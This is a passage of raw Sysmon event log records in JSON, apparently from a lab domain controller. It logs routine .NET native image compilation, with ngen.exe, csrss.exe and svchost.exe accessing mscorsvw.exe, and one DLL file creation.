C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:07.335","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2233-5F25-0000-00108DA70B00}","TargetProcessId":"748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7029,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:07.335\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2233-5F25-0000-00108DA70B00}\r\nTargetProcessId: 748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:07.335","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2233-5F25-0000-00108DA70B00}","TargetProcessId":"748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7030,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:07.335\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2233-5F25-0000-00108DA70B00}\r\nTargetProcessId: 748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:07.335","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2233-5F25-0000-00108DA70B00}","TargetProcessId":"748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7031,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:07.929\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21FA-5F25-0000-0010B2A60A00}\r\nTargetProcessId: 4528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:07.929","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21FA-5F25-0000-0010B2A60A00}","TargetProcessId":"4528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7032,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:07.929\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21FA-5F25-0000-0010B2A60A00}\r\nTargetProcessId: 4528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:07.929","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21FA-5F25-0000-0010B2A60A00}","TargetProcessId":"4528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7033,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:07.945\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2233-5F25-0000-001081AB0B00}\r\nTargetProcessId: 4528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:07.945","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2233-5F25-0000-001081AB0B00}","TargetProcessId":"4528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7034,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:11.882\r\nProcessGuid: {41C8662E-2233-5F25-0000-001081AB0B00}\r\nProcessId: 4528\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11b0-0\\Microsoft.Build.dll\r\nCreationUtcTime: 2020-08-01 08:05:11.882","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:11.882","ProcessGuid":"{41C8662E-2233-5F25-0000-001081AB0B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11b0-0\\Microsoft.Build.dll","CreationUtcTime":"2020-08-01 08:05:11.882","EventReceivedTime":"2020-08-01 08:05:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7035,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:12.007\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2238-5F25-0000-00100CB10B00}\r\nTargetProcessId: 4976\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:12.007","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2238-5F25-0000-00100CB10B00}","TargetProcessId":"4976","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7036,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:12.007\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2238-5F25-0000-00100CB10B00}\r\nTargetProcessId: 4976\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:12.007","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2238-5F25-0000-00100CB10B00}","TargetProcessId":"4976","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
